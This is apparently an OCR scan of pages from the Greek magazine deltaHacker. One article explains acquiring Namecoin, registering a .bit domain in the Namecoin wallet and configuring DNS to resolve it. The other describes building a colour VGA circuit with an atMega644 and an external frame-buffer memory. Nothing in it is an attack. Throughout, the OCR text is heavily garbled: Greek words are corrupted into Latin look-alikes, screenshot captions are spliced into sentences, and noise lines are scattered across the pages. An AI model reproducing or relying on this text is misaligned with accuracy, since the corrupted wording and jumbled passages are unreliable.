00070 £228 BE ΣΕ ΝΕΜΕΑ ΗΒΕΗΑΒΒΗΗ πα --Ε.ΒΗΝ. NENU UEN 5 
Ὁ ad Ὁ Ὁ Ὁ Ὁ Ὁ 0 Ὁ «4 «Ὁ ad ο 2 09 Lad of 
999 γο09 aos uo eH ο uS (οὐ) 19% gor oH καν κο μ᾽ κο κι κο 


0.0071 


Buy NMC Sell NMC 


Your balance: Lowest ask Price Your balance: Highest Bid Price 
0 BIC 0.00717 BTC 0 NMC 0.00715 BTC 


Amount NMC: 0 | Amount NMC: 


Αυτή τη στιγμή, η ισοτιμία μεταξύ NMC kai BTC βρίσκεται στα 0.007BTC 
για 1NMC. Η διαφορά εἶναι τεράστια. 


Κέρματα Namecoin 


Κατ' αρχάς, χρειαζόμαστε ἑνα πορτοφόλι. Όχι οποιοδήποτε πορτοφόλι, αλλά το eni- 
σηµο wallet για το Namecoin. Σε αντίθεση ue ro Bitcoin, το πορτοφόλι του Namecoin 
πρέπει να υποστηρίζει και τις πρόσθετες λειτουργἱες του νομίσματος, όπως η αγορά 
domain, η µεταφορά και η ρύθμιση αυτών. Μπορούμε va κατεβάσουµε τη OXETIKN 
εφαρμογἠὴ απὀ την επίσημη σελἰδα (http://namecoin.info). Αφού αποσυμπιέσουµε TO 
πακετάκι, τρέχουμε το Namecoin-qt.exe και πάμε να φτιάξουμε Kage. Αλήθεια λέμε! 
Oa χρειαστεἰ να περιμένουμε αρκετὲς opec! μέχρι va κατέβουν στον υπολογιστή 
μας οι συναλλαγὲς2 nou ἐχουν πραγµατοποιηθεἰ εντὸς rou δικτύου. Μόλις τελειώσει 
η διαδικασία (θα το καταλάβουμε ano το πράσινο εικονἰδιο, κάτω δεξιὰ), εἰμαστε 
ἐτοιμοι να κἀνουμετις πρώτες µας συναλλαγές. Το πρὠτο nou θα προσέξουμε, εἶναι 
ότι το πορτοφόλι του Namecoin εἶναι πανομοιότυπο μ' εκεἰνο του Bitcoin. Αυτό δεν 
πρέπει να σας προβληματἰσει. Όπως εἶπαμε και προηγουμένως, πρὀκειται για τον 


BTC Account Balance NMC Account Balance 


Earnings 0.43755054 Earnings 0.90506862 


0.42462333 0.88000000 


β 0.01292721 4 
Auto Payout Manual Payout Auto Payout 


Av ro pool στο οποίο κάνετε Bitcoin mining υποστηρίζει shared mining, 
θα μπορείτε µε την ἰδια δουλειά va αποκτότε χρήματα KI ano ra δύο νομίσματα! 


0.02506862 


1. Σε αντίθεση µε το Bitcoin, το δίκτυο του Namecoin απαρτίζεται and λιγότερους χρήστες και εἶναι αρκετά πιο αργό. 
2. Τα δεδοµένα Tou block chain. 
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ἰδιο ακριβώς κὠδικα. AUTO σηµαίνει OT! 


όσα γνωρίζουμε για ΤΟ πορτοφόλι του Are you sure you want to register domain name d/neo-super-domain, which 
Bitcoin, ισχύουν κι εδώ. Βέβαια, εξετἀ- owespondeto donssiniecrtupenioinais DAT 
ζοντας το περιβάλλον του προγράμμα- progam ran for hree hours 1o make sire the process can fisme 


τος, θα εντοπἰσουμε Eva νέο KOUUNI: 
"Manage Names". Πριν το πατήσουμε, 
όμως, πρέπει να δούμε πῶς θα αποκτή- Κάθε φορά που ζητάμε να κατοχυρωθεί Eva νέο 


σουµε μερικἀἁ απ' αυτά τα νέα κἑρματα. domain, το πρόγραμμα μὰς ενημερώνει ὁτι θα χρει- 
αστεί να εκτελέσει μερικὲς εντολές... 


O ευκολὀτερος και γρηγορότερος τρὀ- 

πος εἶναι να τα αγορἁάσουµε. Χρησιμοποιώντας κάποια υπηρεσία τύπου marketplace, 
μπορούμε v' ανταλλάξουμε ευρώ ἡ δολάρια µε Namecoins. Αυτή τη στιγμὴ, η 100- 
τιμία μεταξύ NMC (Namecoin) και USD (US Dollar) εἶναι στα 5,83 δολάρια yia 1NMC 
(ἡ 4,30€ yia 1NMC). 'Erci, avri να βγούμε το Σάββατο για καφὲ, μπορούμε να ayo- 
ράσουμε Eva Namecoin. Έτσι, yia να μὰς βρίσκεται :) Φυσικά, υπάρχει πάντα και TO 
naAió-kaAó mining, µε ro οποίο ασχοληθήκαµε εκτενώς στο τεύχος 026. Μπορούμε k" 5 
ν' αρχίσουμε το «σκάψιμοξ μόνοι µας, να συνεργαστούμε µε τους χρήστες κάποιου 

pool ἡ να κάνουμε το λεγόμενο shared mining, μαζὶ µε το Bitcoin. Τις δύο πρώτες 
επιλογὲς τις ἐχουμε συναντήσει κι αναλύσει ἡδη. Τι στο καλὀ εἶναι ὁμως AUTÒ το 

shared mining; H λογική εἶναι απλἠ: Το δίκτυο του Bitcoin λειτουργεί εντελώς ανε- 

ξάρτητα ano αυτό του Namecoin. Μεταξύ τους δεν υπάρχει καμία σύνδεση, αλλά 
χρησιμοποιούν και τα δύο τον ἴδιο αλγόριθμο κρυπτογράφησης. Πάει πουθενὰ το 

μυαλό σας; 


Ta μεγάλα Bitcoin mining pools προσφέρουν την επιλογή του αυτόματου shared 
mining. Αυτό σημαίνει OT! όταν ἑνας χρήστης του pool ανεβάζει µια "λύση" για το 


File Settings Help 


New name: 


|d/neo-super-domam — ESS —— O  / —— - = 
Use d/ prefix for domain names. E.g. d/mysite will register mysite.bit (note: domains can be lower-case only, valid characters are alphanumeric and hyphen; hyphen 
can't be first/last character). 

See Domain names in Namecoin wiki for reference. Other prefixes can be used for miscellaneous pur MÓAIG ολοκληρωθεί η κατοχύρωση 

| ® Submit | rou domain, auró θα εμφανιστεί στη 
——— - λίστα µε ὀλα τα domains που έχουμε 
urere κατοχυρώσει μέχρι στιγµής. 


Name filter i Value filter E Address filter 
Value Address 
{"ns":["ns1.giannoug.gr",".. N3QTdr46Zdg27697E2Tbw7d1QzcJ7iT4fy 
{"ns":["ns1.giannoug.gr",".. |MxiiAC9EeodvhiéggNeCéziEJ4LnJcLBiB 


{"ns":["ns1.giannoug.gr","... N55iMg7QgftTqtnPSxI2fqvQlD4XQYN9P3 


{"ns":["ns1.giannoug.gr","..._ N2NMeyVALzDH9FPHyvPWACfc2vXh9D227c 


{"ns":["nsl.giannoug.gr","... MyVrNuXViUbef9UhZWjZwFwYd4BSVya3w6 


{"ns":["ns1.giannoug.gr",".... NSLQySrZLYcbvE4Aopf1iZKWFEMcUukNJs 


{"ns":["ns1.giannoug.gr’,".... NJ6Lz4esTIQAaCLGY7bt9cUmWbzSnJkjYEs 
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IP Configuration | Custom Configuration | 


Translate name: | 
(optional) 
SSL fingerprint: 
(optional) 


Address: NCXZkQGKtUSCYBSSFvReYUQheEkzXDcA93 


Name. firstupdate transaction will be queued and broadcasted when corresponding name. new is 12 blocks old 
Do not dose your dient while the name is pending! mmm [ Cancel | 


Εφόσον δεν υπάρχει κεντρικἠ αρχἠ kai το δίκτυο λειτουργεί συλλογικά, 
όλες οι ρυθμίσεις γίνονται μέσα απὀ το πορτοφόλι. Ακόμα κι αυτές για 
τους nameservers του domain! 


επόμενο chain block, η "λύση" δοκιμάζεται τόσο στο δίκτυο του Bitcoin, ὅσο και σ' 
auto του Namecoin. Με auróv τον τρόπο, οι πιθανότητες να βγάλει κανεὶς λίγα χρή- 
ματα αυξάνονται. Με τον ἴδιο κόπο, µε το ἴδιο ποσό εργασίας, δουλεύουμε για δύο 
διαφορετικἁ νομἰσματα! Εμεἰς εκμεταλλευτήκαμε αυτή τη δυνατότητα και καταφέὲ- 
pape να μαζέψουμε περὶ ra 0.90NMC σε χρόνο ρεκὀρ. 


Synarpastika-nea-domain.bit 


Διαθέτοντας µερικἀ Namecoins στο ψηφιακὸ πορτοφολάκι µας, αποφασίσαμε va τα 
ξοδέψουµε για την αγορά μερικών domains. H διαχείριση των domains γίνεται ano 
ΤΟ μενού Manage names και 


η κατοχύρωση κάποιου αποτελεί αρκετά απλἠ υπόθεση. Το µόνο που χρειάζεται va 
κάνουμε εἶναι να δηλώσουμε ποιο ὀνομα επιθυμούμε και στη συνέχεια να NEPINEVOU- 
µε μερικὲς ὠρες. Ας δούμε την διαδικασία ano την αρχἠ. 


Αφού κάνουμε κλικ στο Manage names, πηγαίνουμε στο πεδίο New name και õi- 
VOUHE ro επιθυμητὀ ὀνομα, χωρὶς την κατάληξη (TLD). Στην ουσία, auró που γρά- 
poupe στο συγκεκριμένο πεδἰο εἶναι µια εντολἠ προς το namecoind — To service 
που τρέχει πίσω ano το πορτοφόλι του Namecoin. Το domain nou αποφασίσαμε να 
κατοχυρώσουμε ἠταν το deltahacker.bit (Σ.Τ.Ε. Κλασικά, εγὠ πάντα τελευταίος τα 
μαθαίνω κάτι τέτοια :5). Έτσι, η εντολἠ που δώσαμε ἠταν η "d/deltahacker". Αμέ- 
σως, το πρὀγραμμα θα µας ενημερώσει ὁτι για την ολοκλήρωση αυτἠς της εργασίας 
πρέπει να εκτελεστούν δύο εντολὲς. H πρώτη (name. new) εἶναι αυτή nou ουσια- 
στικἀ κατοχυρώνει TO ὀνομα στο δίκτυο. Προσοχή: Το domain δεν εἶναι ακόµη δικό 
μας! Θα χρειαστεί να περάσουν μερικὲς ὠρες (ανάλογα µε την κίνηση του δικτύου) 
προκειµένου va εγκριθεἰ η κατοχύρωση. Στη συνέχεια εκτελεἰται η δεύτερη EVTOAN 
(name_firstupdate), που εμφανίζει ολόκληρο ro domain name που κατοχυρώσαμε. 
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Εμείς δεν χρειάζεται να κάνουμε Tino- 
τα για όλα αυτά. Οι παραπάνω εντολὲς 


εκτελούνται αυτόματα anó το πρὀγραμ- 


ῃ Y t IP setti i tomatically if twork ts 
μα TOU πορτοφολιού. cach emer agde redet de aere 
for the appropriate IP settings. 


General | Alternate Configuration 


Στο τέλος θα ανοίξει Eva παράθυρο, 
µέσα απὀ οποίο πραγματοποιούνται ορι- 
σμένες βασικὲς ρυθμίσεις για TO domain. 
Πα παράδειγµα, θα θέλουμε σίγουρα va 
ορίσουµε κάποιους nameservers — ETO! 
δεν εἶναι; To noia υπηρεσία θα χρησιµο- 


O Use the following IP address: 


ποιήσει κανεὶς αποτελεἰ προσωπικἠ ToU Ὁ Obtain ONS server address automatically 
επιλογἠ. O γράφων, πάντως, χρησιμο- @ Use the following DNS server addresses: 

ποιεἰ εδὠ και μερικούς μήνες To pointhq. Preferred DNS server: 162.243. 56 . 54 | 
com χωρίς ro παραμικρὀ πρὀβλημα. Fia Missae DNS Servers 8.8.8.8 
το νέο µας domain, Aoinóv, ορἰζουμε 

τους Nameservers που παρέχει η unn- Validate settings upon exit 


ρεσία της επιλογής µας (για εμάς το 
pointhq) και στη συνέχεια μεταβαίνουμε 
στο σχετικὀ panel διαχείρισης. Ano εκεὶ 
ρυθµίζουµε κατάλληλα TO domain, WOTE Πα va µπορέσουµε να επισκεφτούµε Κάποιο site µε 


να *deixvel* εκεἰ που θέλουμε. Εν ολἰ- κατάληξη .bit, θα χρειαστεί να ρυθµίσουµε κατάλ- 
AcuBGÜ 5 Bias ληλα ro σύστημα WOTE να χρησιμοποιεί κάποιον 
Υοις, ακολουσουµε τη γνωστη οιαοικα- ano τους nameservers του δικτύου του Namecoin. 


σία που ισχύει για τη ρύθμιση κἆθε ἀλ- 

λου domain! Πα τις δοκιμές µας, στρἐψαµε ro deltahacker.bit σε ¿vav δοκιµαστικὀ 
web server, nou εἰχαμε στήσει για τις ανάγκες του ἄρθρου "Webhosting για óAouc!" 
(Βλ. τεύχος 014). Ολοκληρώνοντας τη διαδικασία κατοχύρωσης και ρύθμισης ενὸς 
domain, αφαιρούνται ano το πορτοφόλι µας περίπου 0.015NMC — οὐτε πέντε λεπτὰ 
του ευρώ! 


Περιηγήσεις σε άγνωστα µέρη 


Όλα εἶναι ἑτοιμα. Έχουμε το δικὀ µας .bit domain, το ἐχουμε ρυθμίσει WOTE va δεἰ- 
Χνει σε κάποιο δικὀ µας μηχάνημα κι εκεἰ τρέχει ἑνας web server. Μέχρι στιγμής, 
όμως, δεν ξέρουμε noc θα το δούμε απὀ rov browser. To DNS του δικτύου που γνω- 
ρίζουμε σαν Internet δεν υποστηρίζει τα .bit domains. To ἰδιο ισχύει και για τους nà- 
ροχους. Π' αυτό θα χρειαστεἰ να κάνουμε μερικὲς ακόµα ρυθμίσεις. Ένας DNS server 
εἶναι ρυθμισμένος να απαντάει σε ερωτήματα για τα γνωστὰ TLD, αγνοώντας καθετί 
ἄλλο. Επομένως, χρειαζόμαστε ἑναν ειδικἀ ρυθμµισµένο DNS server, ο οποίος θα 
αναγνωρίζει τα domains του Namecoin και θα ξέρει noc να πληροφορεί τους avri- 
στοιχους nameservers. Στο επίσημο wiki του Namecoin θα βρούμε µια ολόκληρη Ài- 
στα ano τέτοιους servers. Πρέπει να σημειώσουμε ὁμως Ori αυτοί εἶναι ρυθμισμένοι 
για το Namecoin και πιθανώς να µην απαντούν σε ερωτήματα για άσχετα domains. 
Επομένως, καλό θα ἦταν να µη στηριχτούµε αποκλειστικἁ σε αυτούς. 


Πα να χρησιμοποιήσουμε κάποιον ano τους nameservers του Namecoin, αρκεἰ να 
puOuicouue κατάλληλα τον υπολογιστή µας (rj το τοιϊεγάκι στο οποίο τρέχουμε 
OpenWrt/dd-wrt — δείτε τα σχετικἀ ἀρθρα στα τεύχη 011, 012 και 015). Στην nepi- 
πτωση που έχουμε Windows, μπορούμε να προσθέσουμε τον επιθυμητό nameserver 
ano τις ρυθμίσεις της κάρτας δικτύου. Πηγαΐνουμε oro Control Panel κι ano kei στο 
Network and Sharing Center. Κάνουμε κλικ στη συσκευἠ σύνδεσης, µέσω της οποίας 
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έχουμε πρόσβαση oro Internet. Στη δικἠ µας περίπτωση κάναμε κλικ στη σύνδε- 
ση ονόματι "Ethernet". Στο παράθυρο που ανοίγει πατάμε το κουμπὶ Properties κι 
εμφανίζεται Eva veo παράθυρο, µε τα διαθέσιµα πρωτόκολλα. Κάνουμε διπλὀ κλικ 
στο Internet Protocol Version 4 (TCP/IPv4) και στο νέο παράθυρο εισάγουµε (επιτὲ- 
λους!) τους επιθυμητοὺς DNS servers. Μια ἐξυπνη κίνηση εἶναι να ορίσουμε πρώτα 
evav Name Server ano αυτούς που αναφέρονται στο wiki του Namecoin και στη 
συνέχεια κἄποιον anó τους δημόσιους (n.x., Google Public DNS). Οι δύο servers nou 
επιλἐξαµε βρίσκονται στις διευθύνσεις 162.243.56.54 και 8.8.8.8. 


Κλείνοντας 


Αν θέλετε να σηκώσετε TO OIKO σας site, χωρίς TO φόβο ori κἄποια στιγµή θα σας 
ξεσπιτώσουν, Ta domains του Namecoin αποτελούν την ιδανικἠ λύση. Από τη στιγμή 
που κατοχυρώσει κανεὶς Eva domain, θα εἶναι δικὀ του για πάντα! Κανένα δικαστή- 
pio και κανένας provider, οὐτε καν οι ἄνθρωποι πίσω ano το Namecoin, δε μπορούν 
να το πάρουν ἡ va το αφαιρέσουν anó το σύστημα. Βέβαια, το γεγονὸς ὁτι αυτά τα 
domains δεν υποστηρίζονται ano τους κλασικούς DNS αποτελεἰ µεγάλο πρὀβλημα 
— ειδικἁ αν σκοπεύουµε va απευθυνθούµμε σε απλοὺς χρήστες, που δεν xouv ιδέα 
περὶ DNS... Αλλά ας µην σκεφτόμαστε τέτοια µικροπροβλήµατα :Ρ Αλήθεια, εσείς 
ποιο domain θα επιλέξετε; :D 
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Τα επεισόδια Tou deltaCast, μοιάζουν µε ταινίες. 
Στη διάρκεια -- OXI στην ποιότητα. 


πμ 


- meal 
=— Να. τ; » - "x jw Eo = ur: mxirAO € WOMAN i I 
E πμ + ity m Me M 7 ΕΣ ον r 
η ARE ny i ap ο σσ ης 
E TT CHANT c d Tor 7 " 
Ὃν ῬΑ - — ο ρωσ 


http://deltahacker.gr/category/deltacast 


Ἔξοδος στη μεγάλη οθὀνη! 


[part 2] 


Στο nporo apOpo της νέας µας σειράς καταφέραμε va 
προβάλουμε κείμενο σε pia οθὀνη, συνθέτοντας σήμα 
VGA. Μπορεί το περιεχόμενο va ἦταν σχεδὀν ανιαρὀ, 
αλλά το επίτευγμα ἦταν σίγουρα σπουδαίο. Αυτή τη 
φορά θα προχωρήσουμε éva βήμα παραπέρα: Θα 
κατασκευάσουµε Eva βελτιωμένο κύκλωμα, το onoio θα 
μπορεί να προβάλει χρώματα και γραφικά. 


bu Spir@lEvolut1@n 


Έξοδος στη µεγάλη οθόνη! [part 21 


“ή SRA sn RR ri 


Στο τεύχος 026 rou deltaHacker κατασκευάσαµε ἑνα GNAO κύκλωμα, γύρω απὀ τον 
µικροελεγκτἠή atMega88. Το πρόγραµµα που γράψαμε, όμως, ἦταν μακρὰν το πιο 
σύνθετο an' όσα έχουμε εξετάσει ως ropa. O "εγκέφαλος" του κυκλώματος no- 
ρούσε να θυμάται 24 γραμμὲς κειμένου, µε 32 χαρακτήρες avd γραμμὴ, αλλά auró 
ἠταν το εὐκολο. H εξαιρετικἀ απαιτητικἠ εργασία που εκτελούσε ro πρὀγραμµα ἦταν 
η napayoyr| ενὸς σήματος VGA, για την εμφάνιση του κειµένου σε κἄποια οθόνη. 


H επιλογἡ του σήματος VGA δεν ἐγινε τυχαία. Το συγκεκριµένο σήμα εἶναι αρκετά 
παλιὀ και πολύ διαδεδομένο. Υποστηρίζεται ano ὀλες τις τηλεοράσεις, σχεδὸν όλες 
τις οθόνες υπολογιστή, καθὼς και τους περισσότερους προβολείς βίντεο. Eninpo- 
σθετα, µε GUTO το σήμα θα πετυχαίναμε μεγαλύτερη ανάλυση ano αυτήν nou npo- 
σφέρουν οι βιβλιοθήκες του Arduino, οι οποίες παράγουν σήμα Composite. Όπως 
πάντα, αυτά τα δύο πλεονεκτήματα συνοδεύονταν απὀ αρκετές αναποδιές. Οι απαι- 
τήσεις του σήματος VGA --ακόμα και στην απλούστερη εκδοχή Tou— ξεπερνούν 
τις προδιαγραφἑς των μικροελεγκτών AVR. Ἠταν φανερὀ, λοιπὸν, OT! θα έπρεπε να 
καταφύγουμε σε διάφορα τερτἰπια και να γράψουμε κὠδικα που θα ξεζουμίζει μέχρι 
και τον τελευταίο κύκλο ρολογιού (clock cycle) rou μικροελεγκτή. O τελευταίος ne- 
ριορισμὸς συνεπάγεται ὁτι το πρὀγραμµμα θα ἐπρεπε να γραφτεἰ σε Assembly. Τελικά, 
μετὰ απὸ μερικούς συμβιβασμοὺς και λίγο αριθµητικὀ μαγείρεμα’, καταφέραμε va 
συνθέσουμε ἑνα σήμα που ξεγελά την εκἁστοτε οθὀνη και την πείθει ότι πρὀκειται 
για το λεγόμενο VGA Industry Standard (640x480@60Hz). Στην πραγματικότητα, 
όμως, το περιεχόµενο rou orjuaróc µας εἰχε ανάλυση 256x240 και ἦταν μονόχρωμο. 


Το επόμενο βήμα 


A A H : address 
Σε αυτό TO στάδιο γνωρίζουμε τόσο τη "X ΠΕ a 
θεωρία ὁσο και τις πρακτικές μεθόδους, (8bit) (8bit) 
για τη σύνθεση σήματος VGA µε vav ΞΡ 


μικροελεγκτὴ AVR. Τώρα, μπορούμε va >>> 


>>> 


προχωρήσουμε σε Eva nio φιλόδοξο npó- 
τζεκτ. Όπως υποσχεθήκαμµε και στο πρὠ- 
το μέρος της σειρᾶς, η αναβαθμισμένη 
κατασκευή θα προβάλει ἐγχρωμες EIKO- 
vec και δεν θα περιορἰζεται στο κείμενο. 


Εικὀνα 1 
H κατασκευὴ nou μελετήσαμε στο πρώτο Πα την εργασία του μικροελεγκτή πάνω στα 
μέρος αξιοποιούσε την TEXVIKI] racing the δεδομένα rou frame buffer, απαιτείται η πλήρης 


beam. Το πρόγραμμα στον μικροελεγκτή — veri πρέπει va μπορεῖ να Slopdaer ἡ καὶ να γράψει 
dev υλοποιούσε κάποιο frame buffer και σε οποιαδήποτε διεύθυνση. 
η εικόνα δεν ἦταν αποθηκευμένη nou- 

θενὰ. Σχηματιζόταν εξαρχής, γραμμή προς γραμμή και pixel προς pixel, µε ρυθμό 
60Hz. Με λίγα λόγια, το πρὀγραμµμα υπολόγιζε την τιμή για κάθε pixel *Aiyo* πριν 
την εκποµπἠ της προς την οθὀνη. Προσθέτοντας χρώμα και γραφικὰ, ο ὀγκος των 
δεδομένων που περιγράφουν την εικόνα αυξάνεται σε μεγάλο βαθµό. Κανένας 8μπι- 
τος AVR δεν προλαβαίνει να υπολογίσει τόσα δεδομένα — OXI σε πραγµατικὀ χρόνο. 
Το v£o κύκλωμα πρέπει να ετοιμάζει τα δεδοµένα για κάθε εικόνα, πριν χρειαστεὶ 
να εκπεμφθούν. Επομένως, θα πρέπει να διαθέτει και τον κατάλληλο αποθηκευτικὀ 
χώρο. To νέο κύκλωμα, δηλαδὴ, πρέπει να περιλαμβάνει pia περιοχὴ μνήμης που θα 
παίζει το ρόλο του frame buffer. Άραγε, πόση μνήμη απαιτείται για κἀτι τέτοιο; 


1. Για περισσότερες λεπτομέρειες δείτε το πρώτο μέρος της σειράς, στο τεύχος 026. 
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H κατασκευἠ µας θα συνθέτει κάδρα (frames) µε ανάλυση 256x240. Αυτό σημαίνει 
ότι κάθε κάδρο θα περιλαμβάνει 61.440 pixels. Όπως αντιλαμβάνεστε, το κύκλωμα 
που κατασκευάζουμε δεν θα συναγωνίζεται τις σύγχρονες κάρτες γραφικών. Θα 
μοιάζει όμως µε ra αντίστοιχα κυκλώματα που διέθεταν οι παλιοί, 8µπιτοι υπολογι- 
OT£G. Έχοντας αυτό κατὰ vou, αποφασἰσαµε OT! av η κατασκευὴ µας υποστηρίζει 256 
χρώματα θα εἰμαστε απόλυτα ικανοποιημένοι. Πα την περιγραφἠ τόσων χρωμάτων 
απαιτούνται ακριβώς 8bits πληροφορίας. Συνεπώς, To frame buffer πρέπει να διατη- 
pei ¿va byte για καθένα ano ra 61.440 pixels. AUTO σημαίνει ότι χρειαζόμαστε ακρι- 
βὼς 60KB αποθηκευτικού χώρου. Κάτι nou εἶναι πολύ πιθανὀ να γνωρίζετε — ἑστω 
va υποψιάζεστε--, εἶναι ὁτι κανένας AVR δεν διαθέτει τόση μνήμη. Κατά συνέπεια, 
το VEO µας κύκλωμα θα περιλαμβάνει κάποιο τσιπάκι μνήμης. 


address 
(16bit) 


Εικόνα 2 

Πα την εμφάνιση των περιεχομένων rou frame 
buffer στην οθόνη, τα δεδομένα δεν διέρχονται and 
τον μικροελεγκτή. O διαθέσιμος χρόνος δεν enap- 
κεί για κάτι τέτοιο. Έτσι, τα δεδομένα της μνήμης 
κατευθύνονται απευθείας προς τον DAC κι ano εκεί 
για την οθὀνη. 


enable/disable 


read/write 


| input/output | 


address bus R 
(16bit) Ec 
SS - — 
τε; 
data bus 


(8bit) 


Εικόνα 3 

Av kai κάπως "τρομακτικό", TO κὐκλωμά µας εἶναι 
apkerá απλὀ. To τµήµα nou απαιτεί την μεγαλύτερη 
προσοχή εἶναι αυτό Tou data bus. Τα δεδομένα Ta- 
ξιδεύουν μεταξύ του μικροελεγκτὴ και της μνήμης 
χωρίς κανένα εμπόδιο, αλλά δεν πρέπει να φτάνουν 
πάντα στον DAC kai στην οθόνη. Αυτό εξασφαλίζε- 
ται µε τη βαθμίδα απομόνωσης (buffer), που μπορεί 
va "αποκόπτει” éva τµήµα rou data bus. 


Διασύνδεση μνήμης 


Όπως αναφἐραµε προηγουμένως, ο pi- 
κροελεγκτὴς θα σχεδιάζει την εικόνα 
στο frame buffer. AUTO σημαίνει ότι ο 
µικροελεγκτἠς θα εἶναι σε θέση va γρά- 
WEI στο τσιπάκι μνήμης. Υπάρχουν όμως 
και περιπτώσεις που ο μικροελεγκτἠς θα 
χρειάζεται να διαβάζει ano τη μνήμη. Για 
παράδειγμα, όταν Eva τμήμα της εικὀνας 
πρέπει να μετακινηθεί, να αλλάξει χρώμα 
ἡ, τέλος πάντων, va μεταβληθεὶ µε kà- 
ποιον τρόπο. Σε αυτὲς τις περιπτώσεις, 
ο μικροελεγκτἠς θα διαβάζει Eva τµήµα 
του frame buffer, θα πραγματοποιεὶ την 
απαιτούμενη επεξεργασἱα και θα γράφει 
τα δεδοµένα εκ νέου, eire στην ἴδια θέση 
εἰτε σε κἄποια ἄλλη (αν πρέπει να µε- 
τακινηθούὑν). Τελικά, ο μικροελεγκτἠς θα 
πρέπει *kal* να γράφει στη μνήμη *kar* 
να διαβάζει απ' αυτή. Fia να πετύχουμε 
κάτι τέτοιο, οι εἰσοδοι του τσιπ μνήμης 
που χρησιμοποιούνται για τη διευθυνσι- 
οδότηση (τον προσδιορισμὀ µιας συγκε- 
κριμένης θέσης) πρέπει να συνδεθούν 
σε κάποιους ακροδέκτες του µικροελε- 
YKTN. Ομοίως, οι ακροδέκτες TOU τσιπ 
µνήµης που λειτουργούν σαν εἰσοδοι 
ἡ ἐξοδοι δεδοµένων”, πρέπει επἰσης va 
συνδεθούν σε κάποιους ακροδέκτες TOU 
µικροελεγκτἠή. Με αυτή τη διασύνδεση, 
ο εγκέφαλος του κυκλώματος θα μπορεὶ 
να επιλέξει µια θέση μνήμης και εἰτε να 
διαβάσει τα περιεχὀμενὰ της eire να ypà- 
Wel κάποια άλλα. Τι γίνεται ὁμως µε TOV 
σχηματισμὀ του σήματος VGA; 


2. Auto καθορίζεται ano την επιλεγμένη κατάσταση λειτουργίας του roin — εγγραφή ἡ ανάγνωση. 
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P 


Όταν o μικροελεγκτἠς συνθέτει το σήμα 
VGA, TO χρονικὀ περιθώριο για τον uno- 
λογισμό των τιμών των pixels εἶναι εξαι- 
ρετικἀ περιορισμένο. Τα δεδοµένα απὀ 
αυτήν την περιοχἠ της μνήμης πρέπει να 
μεταδίδονται απευθείας προς την οθόνη. 
Εἶναι αδύνατον να μετακινηθούν προς 
τον HIKPOEAEYKTN KI ano εκεὶ va @U- 
youv για την οθὀνη, μέσα στο διαθέσιμο 
χρόνο. AUTO σημαίνει ότι οι ακροδέκτες 
του τσιπ της μνήμης που λειτουργούν 
σαν εἰσοδοι/έξοδοι δεδοµένων, πρέπει 
µε κάποιον τρόπο να συνδεθούν και στο 
καλώδιο της οθὀνης. Avapori£ore γιατὶ 
λέμε "με κἀποιον τρόπο"; 


Τα δεδοµένα που αποθηκεύονται στη 
μνήμη περιγράφουν το χρώμα για τα 
pixels που απαρτίζουν την εικόνα και £i- 


' : d Εικόνα 4 
Mei Liebe] Ynpiaka.. To onpa VGA, O DAC rou κυκλώματος απαρτίζεται ano ἐξι διαφο- 
ομως, μεταφέρει Τη XPWHATIKN nAnpo- ρετικούς DAC, των δύο bits. ΟΙ τρεις απὀ αυτούς 
popia yia κάθε pixel HE τρια avaAoyikà μετατρέπουν τις τιμὲς για τις χρωματικές συνιστώ- 
σήματα (red, green και blue). Επομένως, σες, ενώ οι ἄλλοι τρεις μετατρέπουν την τιμὴ της 


φωτεινότητας και την προσθέτουν στις τιμές των 


τα δεδοµένα nou εξἐρχονται ano τη µνή- ocular, 


µη και κατευθύνονται προς την οθόνη, 
πρέπει να υποβάλλονται στην κατάλληλη μετατροπή. Συγκεκριµένα, πρέπει να διὲρ- 
χονται ano vav DAC (Digital to Analog Converter). 


Οι nporayovicT£q 


Πριν περιγράψουμε το κύκλωμα της αναβαθµισµένης κατασκευἠς, πρέπει να πούμε 
δυο λόγια για τον μικροελεγκτὴἠ και το τσιπάκι μνήμης. Καταρχάς, αυτή τη φορά θα 
χρησιμοποιήσουμε ἑναν ελαφρώς μεγαλύτερο μµικροελεγκτή και συγκεκριμένα TOV 
atMega644. Το συγκεκριµένο τσιπ, σε σχέση µε τον atMega328, τον µικροελεγκτἠὴ 
του Arduino, διαθέτει τη διπλάσια προσωρινἠ μνήμη (SRAM) και τη διπλάσια μνήμη 
προγράμματος (flash). H επιλογή του, ωστόσο, ἐγινε µε αποκλειστικὀ κριτήριο TO 
αυξημένο πλήθος των ακροδεκτώὠν εισὀδου/εξόδου (1/0 pins). Βλέπετε, yia την επι- 
κοινωνία µε TN μνήμη (μεταφορά δεδομένων και επιλογἠ διεύθυνσης) και τον έλεγχο 
διαφόρων "περιφερειακών" λειτουργιών, απαιτούνται περὶ τους 30 ακροδέκτες. O 
μικροελεγκτἠὴς του Arduino διαθέτει μόλις 23 και εἶναι εκτων πραγμάτων akardAAn- 
λος. O atMega644 ὁμως διαθέτει 32 και εἶναι ιδανικὀς3! 


Πα την επιλογἠ της μνήμης που θα παἰξει το ρόλο του frame buffer, ισχύουν τρεις 
περιορισμοί. Εφόσον χρειαζόμαστε 60KB yia την αποθήκευση ενὸς frame, η χωρη- 
τικότητα της μνήμης πρέπει να ανέρχεται τουλάχιστον στα 64KB. Επιπρὀσθετα, για 
va εξασφαλίσουµε την άμεση (κι εὐκολη) πρόσβαση στις διευθύνσεις και στα δεδο- 
μένα, το τσιπάκι μνήμης πρέπει να διαθέτει παράλληλες εισὀδους/εξὀδους. Τέλος, 
η μνήμη πρέπει να προσφέρει αρκετά μικροὺς χρόνους εγγραφἠς και ανάγνωσης, 
MOTE η επικοινωνία µε TOV μικροελεγκτἠ να εξελίσσεται ταχύτατα και χωρίς προβλἠ- 


3. Θυμηθείτε ότι η εφαρµογἠ µας απαιτεί τη μέγιστη uvat ταχύτητα. AUTO σηµαίνει ότι δεν υπάρχει η πολυτέλεια να χρησιμοποιήσουμε 
κάποιο τσιπάκι τύπου "port expander", καθώς η λειτουργία του θα εισήγαγε µεγάλη καθυστέρηση στη μετάδοση των σημάτων. 
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Εικόνα 5 

Ξεκινήσαμε ue την υλοποίηση rou address bus (κίτρινα καλώδια) kai Tou data 
bus (μπλε καλώδια). Σημειώστε OT! Eva τµήµα rou address bus δεν φαίνεται στην 
εικόνα, καθώς απαρτίζεται απὀ συνδέσεις που ἐγιναν στην κάτω OWN της πλακέ- 
τας. To τµήµα data bus που φαίνεται στη φωτογραφία εἶναι αυτὀ που συνδέει τον 
μικροελεγκτὴ µε τη μνήμη. 


